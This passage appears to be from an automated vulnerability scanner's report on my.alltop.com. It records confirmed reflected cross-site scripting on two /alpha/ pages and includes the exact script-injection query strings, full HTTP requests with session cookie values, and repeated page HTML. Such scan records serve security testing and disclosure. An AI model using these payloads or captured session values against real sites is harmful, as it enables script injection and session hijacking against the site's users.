Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:32 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:33 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/g

/alpha/g CONFIRMED

http://my.alltop.com/alpha/g?'"--></style></script><script>alert(0x00019C)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00019C)</script>

Request

GET /alpha/g?'"--></style></script><script>netsparker(0x00019C)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:39 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:43 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/f

/alpha/f CONFIRMED

http://my.alltop.com/alpha/f?'"--></style></script><script>alert(0x0001B5)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001B5)</script>

Request

GET /alpha/f?'"--></style></script><script>netsparker(0x0001B5)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
